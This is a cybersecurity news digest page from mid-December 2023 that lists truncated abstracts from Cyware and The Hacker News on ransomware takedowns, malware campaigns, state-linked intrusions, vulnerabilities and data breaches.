Abstract

This attack was seen as retaliation for an earlier cyberattack on Kyivstar, a phone company in Ukraine, which was attributed to Russian hackers. There are suspicions that the Security Service of Ukraine (SBU) may have played a role in the attack.

Cyware

December 21, 2023 – General

Cost of a Data Breach Report 2023: Insights, Mitigators and Best Practices Full Text

Abstract

John Hanley of IBM Security shares 4 key findings from the highly acclaimed annual Cost of a Data Breach Report 2023 What is the IBM Cost of a Data Breach Report? The IBM Cost of a Data Breach Report is an annual report that provides organizations with quantifiable information about the financial impacts of breaches. With this data, they can make data driven decisions about how they implement security in their organization. The report is conducted by the Ponemon Institute and sponsored, analyzed, and published by IBM Security. In 2023, the 18th year the report was published, the report analyzed 553 breaches across 16 countries and 17 industries. According to Etay Maor, Senior Director of Security Strategy at Cato Networks , "We tend to talk a lot about security issues and solutions. This report puts a number behind threats and solutions and provides a lot of information to support claims of how a threat actor, a solution or a process impacts you financially." Key Finding #1: The

The Hacker News

December 21, 2023 – Solution

Subdominator: Open-Source Tool for Detecting Subdomain Takeovers Full Text

Abstract

Subdominator is a highly accurate and fast open-source tool for identifying subdomain takeovers, offering significant improvements over existing tools in terms of fingerprint accuracy and count, nested DNS support, and alternate DNS record matching.

Cyware

December 21, 2023 – Criminals

German Authorities Dismantle Dark Web Hub ‘Kingdom Market’ in Global Operation Full Text

Abstract

German law enforcement has announced the disruption of a dark web platform called Kingdom Market that specialized in the sales of narcotics and malware to "tens of thousands of users." The exercise , which involved collaboration from authorities from the U.S., Switzerland, Moldova, and Ukraine, began on December 16, 2023, the Federal Criminal Police Office (BKA) said. Kingdom Market is said to have been accessible over the TOR and Invisible Internet Project (I2P) anonymization networks since at least March 2021, trafficking in illegal narcotics as well as advertising malware, criminal services, and forged documents. As many as 42,000 products have been sold via several hundred seller accounts on the English language platform prior to its takedown, with 3,600 of them originating from Germany. Transactions on the Kingdom Market were facilitated through cryptocurrency payments in the form of Bitcoin, Litecoin, Monero, and Zcash, with the website operators receiving a 3

The Hacker News

December 21, 2023 – General

AI’s Efficacy is Constrained in Cybersecurity, but Limitless in Cybercrime Full Text

Abstract

The use of AI in cybersecurity has created a cycle where both cyber professionals and cybercriminals employ AI to enhance their tools and techniques. However, there are limitations and trust issues with AI security solutions.

Cyware

December 21, 2023 – Phishing

Hackers Exploiting MS Excel Vulnerability to Spread Agent Tesla Malware Full Text

Abstract

Attackers are weaponizing an old Microsoft Office vulnerability as part of phishing campaigns to distribute a strain of malware called Agent Tesla . The infection chains leverage decoy Excel documents attached in invoice-themed messages to trick potential targets into opening them and activate the exploitation of CVE-2017-11882 (CVSS score: 7.8), a memory corruption vulnerability in Office's Equation Editor that could result in code execution with the privileges of the user. The findings, which come from Zscaler ThreatLabz, build on prior reports from Fortinet FortiGuard Labs, which detailed a similar phishing campaign that exploited the security flaw to deliver the malware. "Once a user downloads a malicious attachment and opens it, if their version of Microsoft Excel is vulnerable, the Excel file initiates communication with a malicious destination and proceeds to download additional files without requiring any further user interaction," security researcher Kaiva

The Hacker News

December 21, 2023 – Phishing

Fake F5 Vulnerability ‘Update’ Delivers Data Wiper to Israeli Victims Full Text

Abstract

The attacker takes advantage of a vulnerability in F5's BIG-IP and tricks recipients into downloading a file that is supposed to be an update for the vulnerability. However, the file actually contains a wiper that deletes F5 servers.

Cyware

December 20, 2023 – General

Malware Leveraging Public Infrastructure Like GitGub on the Rise Full Text

Abstract

Public services like GitHub provide a convenient and less suspicious platform for malware authors to operate their C2 infrastructure, eliminating the need for maintaining their own servers.

Cyware

December 20, 2023 – Ransomware

Remote Encryption Attacks Surge: How One Vulnerable Device Can Spell Disaster Full Text

Abstract

Ransomware groups are increasingly switching to remote encryption in their attacks, marking a new escalation in tactics adopted by financially motivated actors to ensure the success of their campaigns. "Companies can have thousands of computers connected to their network, and with remote ransomware, all it takes is one underprotected device to compromise the entire network," Mark Loman, vice president of threat research at Sophos, said . "Attackers know this, so they hunt for that one' weak spot' — and most companies have at least one. Remote encryption is going to stay a perennial problem for defenders." Remote encryption (aka remote ransomware), as the name implies, occurs when a compromised endpoint is used to encrypt data on other devices on the same network. In October 2023, Microsoft revealed that around 60% of ransomware attacks now involve malicious remote encryption in an effort to minimize their footprint, with more than 80% of all compr

The Hacker News

December 20, 2023 – Attack

Decrypting the Sidewinder Cyber Intrusion Tactics Full Text

Abstract

The Sidewinder group, a sophisticated APT group originating from South Asia, is behind a highly targeted cyber threat campaign involving a malicious Word document with an embedded macro, potentially targeting Nepalese government officials.

Cyware

December 20, 2023 – Solution

Product Explained: Memcyco’s Real-Time Defense Against Website Spoofing Full Text

Abstract

Hands-On Review: Memcyco's Threat Intelligence Solution Website impersonation, also known as brandjacking or website spoofing, has emerged as a significant threat to online businesses. Malicious actors clone legitimate websites to trick customers, leading to financial scams and data theft causing reputation damage and financial losses for both organizations and customers. The Growing Threat of Website Impersonation and Brandjacking Research shows a new phishing site is created every 11 seconds in 2023. Typically, even though the company is a victim of spoofing, the customer holds them responsible for the data breach. Current market solutions rely on threat intelligence tools that search for fake sites and attempt takedowns. However, takedown processes can be time-consuming, leaving fake sites active and the scope of attacks remains unknown during the critical window of exposure, the time between when the fake site is up and until it is down. Bad actor researches a business to t

The Hacker News

December 20, 2023 – Breach

Update: Israel Blames Iran for Hospital Data Breach Full Text

Abstract

Israel has identified Iran and Hezbollah as the perpetrators of a cyberattack on the Ziv Medical Center. The attack, which occurred last month, resulted in the theft of 500GB of medical data.

Cyware

December 20, 2023 – Phishing

Alert: Chinese-Speaking Hackers Pose as UAE Authority in Latest Smishing Wave Full Text

Abstract

The Chinese-speaking threat actors behind Smishing Triad have been observed masquerading as the United Arab Emirates Federal Authority for Identity and Citizenship to send malicious SMS messages with the ultimate goal of gathering sensitive information from residents and foreigners in the country. "These criminals send malicious links to their victims' mobile devices through SMS or iMessage and use URL-shortening services like Bit.ly to randomize the links they send," Resecurity said in a report published this week. "This helps them protect the fake website's domain and hosting location." Smishing Triad was first documented by the cybersecurity company in September 2023, highlighting the group's use of compromised Apple iCloud accounts to send smishing messages for carrying out identity theft and financial fraud. The threat actor is also known to offer ready-to-use smishing kits for sale to other cybercriminals for $200 a month, alongside eng

The Hacker News

December 20, 2023 – Criminals

Global Law Enforcement Seizes $300 Million, Arrests 3,500 Involved in Transnational Cybercrime Operation Full Text

Abstract

The operation targeted various online scams, including voice phishing, romance scams, investment fraud, and e-commerce fraud, highlighting the significant financial incentives driving the growth of organized cybercrime.

Cyware

December 20, 2023 – Criminals

3,500 Arrested in Global Operation HAECHI-IV Targeting Financial Criminals Full Text

Abstract

A six-month-long international police operation codenamed HAECHI-IV has resulted in the arrests of nearly 3,500 individuals and seizures worth $300 million across 34 countries. The exercise, which took place from July through December 2023, took aim at various types of financial crimes such as voice phishing, romance scams, online sextortion, investment fraud, money laundering associated with illegal online gambling, business email compromise fraud, and e-commerce fraud. In addition, authorities froze associated bank and virtual asset service provider (VASP) accounts in an effort to shut off access to criminal proceeds. In total, authorities blocked 82,112 suspicious bank accounts, confiscating $199 million in hard currency and $101 million in virtual assets. "Cooperation between Filipino and Korean authorities led to the arrest in Manila of a high-profile online gambling criminal after a two-year manhunt by Korea's National Police Agency," Interpol, an internationa

The Hacker News

December 20, 2023 – Phishing

Global Malspam Targets Hotels, Spreading Redline and Vidar Stealers Full Text

Abstract

The hospitality industry is being targeted by a sophisticated malspam campaign that uses social engineering tactics to trick hotel representatives into opening password-protected archives containing malware.

Cyware

December 20, 2023 – Malware

New Go-Based JaskaGO Malware Targeting Windows and macOS Systems Full Text

Abstract

A new Go-based information stealer malware called JaskaGO has emerged as the latest cross-platform threat to infiltrate both Windows and Apple macOS systems. AT&T Alien Labs, which made the discovery, said the malware is "equipped with an extensive array of commands from its command-and-control (C&C) server." Artifacts designed for macOS were first observed in July 2023, impersonating installers for legitimate software such as CapCut. Other variants of the malware have masqueraded as AnyConnect and security tools. Upon installation, JaskaGO runs checks to determine if it is executing within a virtual machine (VM) environment, and if so, executes a harmless task like pinging Google or printing a random number in a likely effort to fly under the radar. In other scenarios, JaskaGO proceeds to harvest information from the victim system and establishes a connection to its C&C for receiving further instructions, including executing shell commands, enumerating

The Hacker News

December 20, 2023 – APT

Iranian APT Group Targets Telecom Organizations in North and East Africa Full Text

Abstract

Seedworm (aka Muddywater) continues to use a combination of living-off-the-land and publicly available tools, but has also developed its own custom tools, such as a custom build of Venom Proxy and a custom keylogger.

Cyware

December 20, 2023 – Government

‘No Evidence’ of Foreign Election Interference in 2022 US Midterms, Spy Agencies Say Full Text

Abstract

The U.S. intelligence community has stated that Russia and China attempted to influence the 2022 U.S. midterms, but were unsuccessful in hacking the election infrastructure or disrupting voting.

Cyware

December 20, 2023 – Criminals

Authorities Claim Seizure of Notorious ALPHV Ransomware Gang’s Dark Web Leak Site Full Text

Abstract

The FBI has released a decryption tool that has helped over 500 ALPHV ransomware victims restore their systems, saving them from paying approximately $68 million in ransom demands.

Cyware

December 19, 2023 – Phishing

New Scam Involving Remote Jobs on Social Media Platforms Full Text

Abstract

Researchers at Bitdefender Labs have uncovered a new scam involving remote jobs on social media platforms. Scammers are promising payment for simply liking YouTube videos.

Cyware

December 19, 2023 – Criminals

FBI Takes Down BlackCat Ransomware, Releases Free Decryption Tool Full Text

Abstract

The U.S. Justice Department (DoJ) has officially announced the disruption of the BlackCat ransomware operation and released a decryption tool that victims can use to regain access to files locked by the malware. Court documents show that the U.S. Federal Bureau of Investigation (FBI) enlisted the help of a confidential human source (CHS) to act as an affiliate for the BlackCat and gain access to a web panel used for managing the gang's victims, in what's a case of hacking the hackers. BlackCat , also called ALPHV and Noberus, first emerged in December 2021 and has since gone on to be the second most prolific ransomware-as-a-service variant in the world after LockBit. It's also the first Rust-language-based ransomware strain spotted in the wild. The development puts an end to speculations of a rumored law enforcement action after its dark web leak portal went offline on December 7, only to resurface five days later with just a single victim. The FBI said it worke

The Hacker News

December 19, 2023 – Government

FBI, CISA, and ACSC Release Joint Advisory on Play Ransomware Full Text

Abstract

The Play ransomware group has been targeting businesses and critical infrastructure in North America, South America, and Europe since June 2022. They use a double-extortion model, encrypting systems after exfiltrating data.

Cyware

December 19, 2023 – Criminals

Behind the Scenes of Matveev’s Ransomware Empire: Tactics and Team Full Text

Abstract

Cybersecurity researchers have shed light on the inner workings of the ransomware operation led by Mikhail Pavlovich Matveev, a Russian national who was indicted by the U.S. government earlier this year for his alleged role in launching thousands of attacks across the world. Matveev, who resides in Saint Petersburg and is known by the aliases Wazawaka, m1x, Boriselcin, Uhodiransomwar, Orange, and waza, is alleged to have played a crucial part in the development and deployment of LockBit, Babuk, and Hive ransomware variants since at least June 2020. "Wazawaka and his team members prominently exhibit an insatiable greed for ransom payments, demonstrating a significant disregard for ethical values in their cyber operations," Swiss cybersecurity firm PRODAFT said in a comprehensive analysis shared with The Hacker News. "Employing tactics that involve intimidation through threats to leak sensitive files, engaging in dishonest practices, and persisting in retaining fil

The Hacker News

December 19, 2023 – Attack

Ransomware Attack on Westpole Disrupted Digital Services for Italian Public Administration Full Text

Abstract

One of Westpole's customers, PA Digitale, which serves 1300 public administrations including 540 municipalities, was targeted. The incident has led to manual operations for some services and may affect salary payments.

Cyware

December 19, 2023 – Hacker

Hackers Abusing GitHub to Evade Detection and Control Compromised Hosts Full Text

Abstract

Threat actors are increasingly making use of GitHub for malicious purposes through novel methods, including abusing secret Gists and issuing malicious commands via git commit messages. "Malware authors occasionally place their samples in services like Dropbox, Google Drive, OneDrive, and Discord to host second stage malware and sidestep detection tools," ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News. "But lately, we have observed the increasing use of the GitHub open-source development platform for hosting malware." Legitimate public services are known to be used by threat actors for hosting malware and acting as dead drop resolvers to fetch the actual command-and-control (C2) address. While using public sources for C2 does not make them immune to takedowns, they do offer the benefit of allowing threat actors to easily create attack infrastructure that's both inexpensive and reliable. This technique is sneaky

The Hacker News

December 19, 2023 – Phishing

Novel SMTP Smuggling Technique Slips Past DMARC, Email Protections Full Text

Abstract

Attackers can exploit SMTP smuggling to send spoofed emails with fake sender addresses, bypassing email security checks and putting organizations and individuals at risk for targeted phishing attacks.

Cyware

December 19, 2023 – General

Are We Ready to Give Up on Security Awareness Training? Full Text

Abstract

Some of you have already started budgeting for 2024 and allocating funds to security areas within your organization. It is safe to say that employee security awareness training is one of the expenditure items, too. However, its effectiveness is an open question with people still engaging in insecure behaviors at the workplace. Besides, social engineering remains one of the most prevalent attacks, followed by a successful data breach. Microsoft found that a popular form of video-based training reduces phish-clicking behavior by about 3%, at best. This number has been stable over the years, says Microsoft, while phishing attacks are increasing yearly. Regardless, organizations have faith in training and tend to increase their security investments in employee training after attacks. It comes second in the priority list for 51% of organizations, right after incident response planning and testing, according to the IBM Security "Cost of the Data Breach Report 2023" . So, wh

The Hacker News

December 19, 2023 – Government

US Agencies Release Security Guidance on Managing SBOMs and Open Source Software Full Text

Abstract

The report provides guidance on open source software adoption, including criteria for selection, risk assessment, licensing, export control, maintenance, vulnerability response, and secure software delivery.

Cyware

December 19, 2023 – Attack

Iranian Hackers Using MuddyC2Go in Telecom Espionage Attacks Across Africa Full Text

Abstract

The Iranian nation-state actor known as MuddyWater has leveraged a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan, and Tanzania. The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix. Active since at least 2017, MuddyWater is assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS), primarily singling out entities in the Middle East. The cyber espionage group's use of MuddyC2Go was first highlighted by Deep Instinct last month, describing it as a Golang-based replacement for PhonyC2 , itself a successor to MuddyC3. However, there is evidence to suggest that it may have been employed as early as 2020. While the full extent of MuddyC2Go'

The Hacker News

December 19, 2023 – Attack

Iran Hit by Major Cyberattack Targeting Nation’s Fuel Supply Full Text

Abstract

Gas stations in Iran experienced widespread disruptions due to a cyberattack claimed by the group Predatory Sparrow, which has previously targeted Iranian critical infrastructure.

Cyware

December 19, 2023 – Phishing

New Malvertising Campaign Distributing PikaBot Disguised as Popular Software Full Text

Abstract

The malware loader known as PikaBot is being distributed as part of a malvertising campaign targeting users searching for legitimate software like AnyDesk. "PikaBot was previously only distributed via malspam campaigns similarly to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577," Malwarebytes' Jérôme Segura said . The malware family, which first appeared in early 2023, consists of a loader and a core module that allows it to operate as a backdoor as well as a distributor for other payloads. This enables the threat actors to gain unauthorized remote access to compromised systems and transmit commands from a command-and-control (C2) server, ranging from arbitrary shellcode, DLLs, or executable files, to other malicious tools such as Cobalt Strike. One of the threat actors leveraging PikaBot in its attacks is TA577 , a prolific cybercrime threat actor that has, in the past, delivered QakBot, IcedID, SystemBC, SmokeLoad

The Hacker News

December 19, 2023 – Attack

Apparel Giant VF Corporation Reports Cyberattack on First Day of SEC Disclosure Rule Full Text

Abstract

VF Corporation, one of the largest apparel companies in the world, reported a cyberattack to the U.S. Securities and Exchange Commission (SEC) on the first day of a new cyber incident reporting rule.

Cyware

December 18, 2023 – General

Pro-China Influence Operation Gained YouTube Following, Researchers Find Full Text

Abstract

The campaign utilizes a network of at least 30 YouTube channels and employs tactics associated with both Russian and Chinese influence operations, including the use of artificially generated voices in videos.

Cyware

December 18, 2023 – Vulnerabilities

Beware: Experts Reveal New Details on Zero-Click Outlook RCE Exploits Full Text

Abstract

Technical details have emerged about two now-patched security flaws in Microsoft Windows that could be chained by threat actors to achieve remote code execution on the Outlook email service sans any user interaction. "An attacker on the internet can chain the vulnerabilities together to create a full, zero-click remote code execution (RCE) exploit against Outlook clients," Akamai security researcher Ben Barnea, who discovered the vulnerabilities, said in a two-part report shared with The Hacker News. The security issues, which were addressed by Microsoft in August and October 2023 , respectively, are listed below - CVE-2023-35384 (CVSS score: 5.4) - Windows HTML Platforms Security Feature Bypass Vulnerability CVE-2023-36710 (CVSS score: 7.8) - Windows Media Foundation Core Remote Code Execution Vulnerability CVE-2023-35384 has been described by Akamai as a bypass for a critical security flaw that Microsoft patched in March 2023. Tracked as CVE-2023-23397 (C

The Hacker News

December 18, 2023 – Government

UK National Grid Pulls Chinese Equipment Over Cybersecurity Concerns Full Text

Abstract

The contract with NR Electric UK, a subsidiary of China's Nari Technology, was terminated without reason given in April, highlighting growing concerns over Chinese involvement in critical infrastructure.

Cyware

December 18, 2023 – General

Top 7 Trends Shaping SaaS Security in 2024 Full Text

Abstract

Over the past few years, SaaS has developed into the backbone of corporate IT. Service businesses, such as medical practices, law firms, and financial services firms, are almost entirely SaaS based. Non-service businesses, including manufacturers and retailers, have about 70% of their software in the cloud. These applications contain a wealth of data, from minimally sensitive general corporate information to highly sensitive intellectual property, customer records, and employee data. Threat actors have noted this shift, and are actively working to breach apps to access the data. Here are the top trends influencing the state of SaaS Security for 2024 — and what you can do about it. Democratization of SaaS SaaS apps have transformed the way organizations purchase and use software. Business units purchase and onboard the SaaS tools that best fit their needs. While this is empowering for business units that have long been frustrated by delays in procuring and onboarding software, i

The Hacker News

December 18, 2023 – Insider Threat

Ubiquiti Fixes Glitch That Exposed Private Video Streams to Other Customers Full Text

Abstract

The bug was caused by a misconfiguration during an upgrade to Ubiquiti's cloud infrastructure, resulting in 1,216 accounts being improperly associated with another group of 1,177 accounts.

Cyware

December 18, 2023 – Malware

Rhadamanthys Malware: Swiss Army Knife of Information Stealers Emerges Full Text

Abstract

The developers of the information stealer malware known as Rhadamanthys are actively iterating on its features, broadening its information-gathering capabilities and also incorporating a plugin system to make it more customizable. This approach not only transforms it into a threat capable of delivering "specific distributor needs," but also makes it more potent, Check Point said in a technical deepdive published last week. Rhadamanthys, first documented by ThreatMon in October 2022, has been sold under the malware-as-a-service (MaaS) model as early as September 2022 by an actor under the alias "kingcrete2022." Typically distributed through malicious websites mirroring those of genuine software that are advertised through Google ads, the malware is capable of harvesting a wide range of sensitive information from compromised hosts, including from web browsers, crypto wallets, email clients, VPN, and instant messaging apps. "Rhadamanthys represents a s

The Hacker News

December 18, 2023 – Botnet

InfectedSlurs Botnet Targets QNAP VioStor NVR Vulnerability Full Text

Abstract

Default admin credentials and outdated, unsupported networked systems are being exploited as routes for botnet infections, highlighting the importance of updating and securing legacy systems.

Cyware

December 18, 2023 – Policy and Law

Four U.S. Nationals Charged in $80 Million Pig Butchering Crypto Scam Full Text

Abstract

Four U.S. nationals have been charged for participating in an illicit scheme that earned them more than $80 million via cryptocurrency investment scams. The defendants – Lu Zhang, 36, of Alhambra, California; Justin Walker, 31, of Cypress, California; Joseph Wong, 32, Rosemead, California; and Hailong Zhu, 40, Naperville, Illinois – have been charged with conspiracy to commit money laundering, concealment money laundering, and international money laundering. The U.S. Department of Justice (DoJ), which announced the arrests of both Zhang and Walker in connection with the fraudulent operation, said the quartet opened shell companies and bank accounts to carry out pig butchering scams , transferring the ill-gotten funds to domestic and international financial entities. If convicted, Zhang and Walker face a maximum penalty of 20 years in prison. Their alleged co-conspirators remain at large. "The overall fraud scheme in the related pig-butchering syndicate involved at least 284

The Hacker News

December 18, 2023 – Policy and Law

NY Engineer Pleads Guilty to Stealing Millions From Two Crypto Exchanges Full Text

Abstract

A former security engineer has pleaded guilty to hacking two decentralized cryptocurrency exchanges, resulting in the theft of over $12 million. The hacker exploited vulnerabilities in the smart contracts of the exchanges.

Cyware

December 18, 2023 – General

Unmasking the Dark Side of Low-Code/No-Code Applications Full Text

Abstract

Low-code/no-code (LCNC) and robotic process automation (RPA) have gained immense popularity, but how secure are they? Is your security team paying enough attention in an era of rapid digital transformation, where business users are empowered to create applications swiftly using platforms like Microsoft PowerApps, UiPath, ServiceNow, Mendix, and OutSystems? The simple truth is often swept under the rug. While low-code/no-code (LCNC) apps and robotic process automations (RPA) drive efficiency and agility, their dark security side demands scrutiny. LCNC application security emerges as a relatively new frontier, and even seasoned security practitioners and security teams grapple with the dynamic nature and sheer volume of citizen-developed applications. The accelerated pace of LCNC development poses a unique challenge for security professionals, underscoring the need for dedicated efforts and solutions to effectively address the security nuances of low-code development environments. Dig

The Hacker News

December 18, 2023 – Education

Fortifying Cyber Defenses: A Proactive Approach to Ransomware Resilience Full Text

Abstract

Investing in cutting-edge cybersecurity tools not only enhances defensive capabilities but also stimulates innovation and fosters public-private partnerships to strengthen the nation's cyber defenses.

Cyware

December 18, 2023 – Malware

QakBot Malware Resurfaces with New Tactics, Targeting the Hospitality Industry Full Text

Abstract

A new wave of phishing messages distributing the QakBot malware has been observed, more than three months after a law enforcement effort saw its infrastructure dismantled by infiltrating its command-and-control (C2) network. Microsoft, which made the discovery, described it as a low-volume campaign that began on December 11, 2023, and targeted the hospitality industry. "Targets received a PDF from a user masquerading as an IRS employee," the tech giant said in a series of posts shared on X (formerly Twitter). "The PDF contained a URL that downloads a digitally signed Windows Installer (.msi). Executing the MSI led to Qakbot being invoked using export 'hvsi' execution of an embedded DLL." Microsoft said that the payload was generated the same day the campaign started and that it's configured with the previously unseen version 0x500. Zscaler ThreatLabz, in a post shared on X, described the resurfaced QakBot as a 64-bit binary that utilizes AES

The Hacker News

December 17, 2023 – Breach

MongoDB Suffers Security Breach, Exposing Customer Data Full Text

Abstract

MongoDB on Saturday disclosed it's actively investigating a security incident that has led to unauthorized access to "certain" corporate systems, resulting in the exposure of customer account metadata and contact information. The American database software company said it first detected anomalous activity on December 13, 2023, and that it immediately activated its incident response efforts. It further noted that "this unauthorized access has been going on for some period of time before discovery," but emphasized it's not "aware of any exposure to the data that customers store in MongoDB Atlas." It did not disclose the exact time period of the compromise. In light of the breach, MongoDB recommends that all customers be on the lookout for social engineering and phishing attacks, enforce phishing-resistant multi-factor authentication (MFA), as well as rotate their MongoDB Atlas passwords. That's not all. The company said it's also expe

The Hacker News

December 16, 2023 – Outage

Central Bank of Lesotho Facing Outages After Cyberattack Full Text

Abstract

The ongoing downtime of the National Payments System has made it impossible for local banks in Lesotho to honor inter-bank transactions, requiring alternative measures to facilitate payments.

Cyware

December 16, 2023 – Outage

Ontario Public Library Shuts Down Most Services Due to Cyberattack Full Text

Abstract

The attack on the library, along with recent ransomware incidents at other major libraries, underscores the need for improved cybersecurity measures and data protection in the library sector.

Cyware

December 16, 2023 – Government

China’s MIIT Introduces Color-Coded Action Plan for Data Security Incidents Full Text

Abstract

China's Ministry of Industry and Information Technology (MIIT) on Friday unveiled draft proposals detailing its plans to tackle data security events in the country using a color-coded system. The effort is designed to "improve the comprehensive response capacity for data security incidents, to ensure timely and effective control, mitigation and elimination of hazards and losses caused by data security incidents, to protect the lawful rights and interests of individuals and organizations, and to safeguard national security and public interests, the department said. The 25-page document encompasses all incidents in which data has been illegally accessed, leaked, destroyed, or tampered with, categorized them into four hierarchical tiers based on the scope and the degree of harm caused - Red: Level I ("especially significant"), which applies to widespread shutdowns, substantial loss of business processing capability, interruptions arising due to serious anomalie

The Hacker News

December 16, 2023 – Phishing

PikaBot Distributed via Malicious Search Ads Full Text

Abstract

Threat actors are bypassing Google's security measures and using fingerprinting techniques to ensure successful execution of malicious downloads, pointing to a potential "malvertising as a service" model.

Cyware

December 16, 2023 – Hacker

Microsoft Warns of Storm-0539: The Rising Threat Behind Holiday Gift Card Frauds Full Text

Abstract

Microsoft is warning of an uptick in malicious activity from an emerging threat cluster it's tracking as Storm-0539 for orchestrating gift card fraud and theft via highly sophisticated email and SMS phishing attacks against retail entities during the holiday shopping season. The goal of the attacks is to propagate booby-trapped links that direct victims to adversary-in-the-middle (AiTM) phishing pages that are capable of harvesting their credentials and session tokens. "After gaining access to an initial session and token, Storm-0539 registers their own device for subsequent secondary authentication prompts, bypassing MFA protections and persisting in the environment using the fully compromised identity," the tech giant said in a series of posts on X (formerly Twitter). The foothold obtained in this manner further acts as a conduit for escalating privileges, moving laterally across the network, and accessing cloud resources in order to grab sensitive information,

The Hacker News

December 15, 2023 – Criminals

Researchers Detect Undocumented 8220 Gang Activities Full Text

Abstract

The 8220 gang, a Chinese-origin threat actor, continues to target Windows and Linux web servers with cryptojacking malware using evolving tactics and known vulnerabilities.

Cyware

December 15, 2023 – Botnet

New KV-Botnet Targeting Cisco, DrayTek, and Fortinet Devices for Stealthy Attacks Full Text

Abstract

A new botnet consisting of firewalls and routers from Cisco, DrayTek, Fortinet, and NETGEAR is being used as a covert data transfer network for advanced persistent threat actors, including the China-linked threat actor called Volt Typhoon . Dubbed KV-botnet by the Black Lotus Labs team at Lumen Technologies, the malicious network is an amalgamation of two complementary activity clusters that have been active since at least February 2022. "The campaign infects devices at the edge of networks, a segment that has emerged as a soft spot in the defensive array of many enterprises, compounded by the shift to remote work in recent years," the company said . The two clusters – codenamed KY and JDY – are said to be distinct yet working in tandem to facilitate access to high-profile victims as well as establish covert infrastructure. Telemetry data suggests that the botnet is commandeered from IP addresses based in China. While the bots part of JDY engages in broader scanning

The Hacker News

December 15, 2023 – Criminals

ALPHV Ransomware Gang Returns, Sorta Full Text

Abstract

The ALPHV ransomware gang is facing technical difficulties, with their leak site showing only one victim and negotiation links not working, potentially leaving them without payment.

Cyware

December 15, 2023 – Breach

Crypto Hardware Wallet Ledger’s Supply Chain Breach Results in $600,000 Theft Full Text

Abstract

Crypto hardware wallet maker Ledger published a new version of its " @ledgerhq/connect-kit " npm module after unidentified threat actors pushed malicious code that led to the theft of more than $600,000 in virtual assets. The compromise was the result of a former employee falling victim to a phishing attack, the company said in a statement. This allowed the attackers to gain access to Ledger's npm account and upload three malicious versions of the module – 1.1.5, 1.1.6, and 1.1.7 — and propagate crypto drainer malware to other applications that are dependent on the module, resulting in a software supply chain breach. "The malicious code used a rogue WalletConnect project to reroute funds to a hacker wallet," Ledger said . Connect Kit , as the name implies, makes it possible to connect DApps (short decentralized applications) to Ledger's hardware wallets. According to security firm Sonatype, version 1.1.7 directly embedded a wallet-draining pa

The Hacker News

December 15, 2023 – Breach

Data of Over a Million Users of the Crypto Exchange GokuMarket Exposed Full Text

Abstract

The centralized crypto exchange GokuMarket, owned by ByteX, left an open instance, exposing sensitive user data, including IP addresses, email addresses, encrypted passwords, and crypto wallet addresses.

Cyware

December 15, 2023 – General

Bug or Feature? Hidden Web Application Vulnerabilities Uncovered Full Text

Abstract

Web Application Security consists of a myriad of security controls that ensure that a web application: Functions as expected. Cannot be exploited to operate out of bounds. Cannot initiate operations that it is not supposed to do. Web Applications have become ubiquitous after the expansion of Web 2.0, which Social Media Platforms, E-Commerce websites, and email clients saturating the internet spaces in recent years. As the applications consume and store even more sensitive and comprehensive data, they become an ever more appealing target for attackers. Common Attack Methods The three most common vulnerabilities that exist in this space are Injections (SQL, Remote Code), Cryptographic Failures (previously sensitive data exposure), and Broken Access Control (BAC). Today, we will focus on Injections and Broken Access Control. Injections SQL is the most common Database software that is used, and hosts a plethora of payment data, PII data, and internal business records. A SQ

The Hacker News

December 15, 2023 – Criminals

BianLian, White Rabbit, and Mario Ransomware Gangs Spotted in a Joint Extortion Campaign Full Text

Abstract

The ransomware gangs utilized a "password spraying" attack and compromised email accounts through Business Email Compromise (BEC) to anonymously deliver ransom payment demands and complicate investigations.

Cyware

December 15, 2023 – Vulnerabilities

New Security Vulnerabilities Uncovered in pfSense Firewall Software - Patch Now Full Text

Abstract

Multiple security vulnerabilities have been discovered in the open-source Netgate pfSense firewall solution called pfSense that could be chained by an attacker to execute arbitrary commands on susceptible appliances. The issues relate to two reflected cross-site scripting ( XSS ) bugs and one command injection flaw, according to new findings from Sonar. "Security inside a local network is often more lax as network administrators trust their firewalls to protect them from remote attacks," security researcher Oskar Zeino-Mahmalat said . "Potential attackers could have used the discovered vulnerabilities to spy on traffic or attack services inside the local network." Impacting pfSense CE 2.7.0 and below and pfSense Plus 23.05.1 and below, the shortcomings could be weaponized by tricking an authenticated pfSense user (i.e., an admin user) into clicking on a specially crafted URL, which contains an XSS payload that activates command injection. A brief description

The Hacker News

December 15, 2023 – Attack

Kraft Heinz Reviewing Claims of Cyberattack but Internal Systems ‘Operating Normally’ Full Text

Abstract

Kraft Heinz is investigating claims of a data breach by the Snatch ransomware gang, but currently sees no evidence of a broader attack or adverse effects on its internal systems.

Cyware

December 15, 2023 – Privacy

Google’s New Tracking Protection in Chrome Blocks Third-Party Cookies Full Text

Abstract

Google on Thursday announced that it will start testing a new feature called "Tracking Protection" starting January 4, 2024, to 1% of Chrome users as part of its efforts to deprecate third-party cookies in the web browser. The setting is designed to limit "cross-site tracking by restricting website access to third-party cookies by default," Anthony Chavez, vice president of Privacy Sandbox at Google, said . The tech giant noted that participants for Tracking Protection will be selected at random and that chosen users will be notified upon opening Chrome on either a desktop or an Android device. The goal is to restrict third-party cookies (also called "non-essential cookies") by default, preventing them from being used to track users as they move from one website to the other for serving personalized ads. While several major browsers like Apple Safari and Mozilla Firefox have either already placed restrictions on third-party cookies via features l

The Hacker News

December 15, 2023 – Malware

New NKAbuse Malware Exploits NKN Blockchain Tech for DDoS Attacks Full Text

Abstract

A novel multi-platform threat called NKAbuse has been discovered using a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel. "The malware utilizes NKN technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities," Russian cybersecurity company Kaspersky said in a Thursday report. NKN, which has over 62,000 nodes, is described as a "software overlay network built on top of today's Internet that enables users to share unused bandwidth and earn token rewards." It incorporates a blockchain layer on top of the existing TCP/IP stack. While threat actors are known to take advantage of emerging communication protocols for command-and-control (C2) purposes and evade detection, NKAbuse leverages blockchain technology to conduct distributed denial-of-service (DDoS) attacks and function as an implant inside com

The Hacker News

December 14, 2023 – General

